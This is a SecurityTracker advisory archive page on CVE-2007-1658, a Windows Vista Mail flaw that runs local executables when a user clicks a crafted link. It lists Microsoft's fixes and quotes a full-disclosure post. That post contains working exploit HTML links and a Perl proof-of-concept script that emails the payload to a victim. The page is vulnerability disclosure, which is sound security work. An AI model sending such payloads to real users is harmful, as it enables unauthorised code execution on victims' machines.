SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Windows Mail Vendors:   Microsoft
Windows Mail URL Bug Lets Remote Users Cause Execute Existing Code on the Target User's System to Be Executed
SecurityTracker Alert ID:  1017816
SecurityTracker URL:  http://securitytracker.com/id/1017816
CVE Reference:   CVE-2007-1658   (Links to External Site)
Updated:  Jun 12 2007
Original Entry Date:  Mar 26 2007
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in Windows Mail. A remote user can cause code to be executed on the target user's system without warning when the user clicks on a link.

A remote user can send an e-mail message containing a specially crafted link that, when loaded by the target user, will execute an arbitrary existing executable file located on the target user's system. The executable will run without warning and will run with the privileges of the target user.

Kingcope discovered this vulnerability.

Impact:   A remote user can cause existing code located on the target user's system to be executed with the privileges of the target user when the user clicks on a specially crafted link.
Solution:   Microsoft has issued the following fixes as part of a cumulative update for Microsoft Outlook and Windows Mail.

Windows XP Service Pack 2, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=27cca556-0872-4803-b610-4c895ceb99aa

Windows XP Professional x64 Edition, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1ea813bf-bddb-40f0-8960-b9debc8413e7

Windows XP Professional x64 Edition Service Pack 2, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1ea813bf-bddb-40f0-8960-b9debc8413e7

Windows Server 2003 Service Pack 1, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=93808a74-035c-4ab7-9283-c693d7bd82be

Windows Server 2003 Service Pack 2, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=93808a74-035c-4ab7-9283-c693d7bd82be

Windows Server 2003 x64 Edition, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=f63323a9-e285-45e5-84bd-71ae9da126e3

Windows Server 2003 x64 Edition Service Pack 2, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=f63323a9-e285-45e5-84bd-71ae9da126e3

Windows Server 2003 with SP1 for Itanium-based Systems, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2e62e96e-6571-437d-a612-99175ac39025

Windows Server 2003 with SP2 for Itanium-based Systems, Microsoft Outlook Express 6:

http://www.microsoft.com/downloads/details.aspx?FamilyId=2e62e96e-6571-437d-a612-99175ac39025

Windows Vista, Windows Mail:

http://www.microsoft.com/downloads/details.aspx?FamilyId=ee57de19-44ea-48f2-ae28-e76fd2018633

Windows Vista x64 Edition, Windows Mail:

http://www.microsoft.com/downloads/details.aspx?FamilyId=343db20f-7794-4423-b11d-885329fbdf78

A restart is not required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms07-034.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms07-034.mspx (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Vista)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Microsoft Windows Vista - Windows Mail Client

This is a multi-part message in MIME format.

--===============1363153736==
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0125_01C76D28.8A9B9540"

This is a multi-part message in MIME format.

------=_NextPart_000_0125_01C76D28.8A9B9540
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Microsoft Windows Vista - Windows Mail Client Side Code Execution =
Vulnerability
Successfully Tested on Windows Vista Ultimate

Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero

Description
Windows Mail is the default Mail Client of Microsoft Windows Vista.

Vulnerability
Remote Code Execution is possible if a user clicks on a malicious =
prepared link.
Vistas Mail Client will execute any executable file if a folder exists =
with the same name.
For example the victim has a folder in C:\ named blah and a batch script =
named blah.bat
also in C:\. Now if the victim clicks on a link in the email message =
with the URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ =
named winrm.cmd
(and also a folder named winrm inside System32).

Exploit:
Send a HTML email message containing the URL:
<a href=3D"c:/windows/system32/winrm?">Click here!</a>
or
<a href=3D"c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.

I could not pass arguments to winrm (hehe this would be beautiful), but =
I guess there
are several attack vectors.

Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp =3D Net::SMTP_auth->new('smtp.1und1.de', Debug =3D> 1);

$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\@attacker.com");
$smtp->to("victim\@victim.com");

$msg =3D "Subject: Vista Remote Code Exec\r\n"
."From: attacker\@attacker.com\r\n"
."To: victim\@victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a =
href=3D\"c:/windows/system32/winrm?\">Click here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
---snip---


Signed,

Kingcope / kingcope[at]gmx.net / 2007


------=_NextPart_000_0125_01C76D28.8A9B9540
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.6000.16386" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2>
<DIV><BR>Microsoft Windows Vista - Windows Mail Client Side Code =
Execution=20
Vulnerability<BR>Successfully Tested on Windows Vista Ultimate</DIV>
<DIV>&nbsp;</DIV>
<DIV>Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero</DIV>
<DIV>&nbsp;</DIV>
<DIV>Description<BR>Windows Mail is the default Mail Client of Microsoft =
Windows=20
Vista.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Vulnerability<BR>Remote Code Execution is possible if a user clicks =
on a=20
malicious prepared link.<BR>Vistas Mail Client will execute any =
executable file=20
if a folder exists with the same name.<BR>For example the victim has a =
folder in=20
C:\ named blah and a batch script named blah.bat<BR>also in C:\. Now if =
the=20
victim clicks on a link in the email message with the URL target<BR>set =
to=20
C:\blah the batch script is executed without even asking.<BR>There is =
for=20
example a CMD script by default in C:\Windows\System32\ named =
winrm.cmd<BR>(and=20
also a folder named winrm inside System32).</DIV>
<DIV>&nbsp;</DIV>
<DIV>Exploit:<BR>Send a HTML email message containing the URL:<BR>&lt;a=20
href=3D"c:/windows/system32/winrm?"&gt;Click =
here!&lt;/a&gt;<BR>or<BR>&lt;a=20
href=3D"c:/windows/system32/migwiz?"&gt;Click here!&lt;/a&gt;<BR>and=20
winrm.cmd/migwiz.exe gets executed without asking for =
permission.<BR>These are=20
just examples.</DIV>
<DIV>&nbsp;</DIV>
<DIV>I could not pass arguments to winrm (hehe this would be beautiful), =
but I=20
guess there<BR>are several attack vectors.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Proof of Concept<BR>---snip---<BR>use Net::SMTP_auth;<BR>$smtp =3D=20
Net::SMTP_auth-&gt;new('smtp.1und1.de', Debug =3D&gt; 1);</DIV>
<DIV>&nbsp;</DIV>
<DIV>$smtp-&gt;auth('PLAIN', 'username',=20
'password');<BR>$smtp-&gt;mail("attacker\@attacker.com");<BR>$smtp-&gt;to=
("victim\@victim.com");</DIV>
<DIV>&nbsp;</DIV>
<DIV>$msg =3D "Subject: Vista Remote Code Exec\r\n"<BR>."From:=20
attacker\@attacker.com\r\n"<BR>."To: =
victim\@victim.com\r\n"<BR>."MIME-Version:=20
1.0\r\n"<BR>."Content-Type: text/html\r\n\r\n&lt;a=20
href=3D\"c:/windows/system32/winrm?\"&gt;Click=20
here!&lt;/a&gt;";<BR>$smtp-&gt;data();<BR>$smtp-&gt;datasend("$msg\n");<B=
R>$smtp-&gt;dataend();<BR>$smtp-&gt;quit;<BR>---snip---</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Signed,</DIV>
<DIV>&nbsp;</DIV>
<DIV>Kingcope / kingcope[at]gmx.net / 2007<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0125_01C76D28.8A9B9540--


--===============1363153736==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1363153736==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC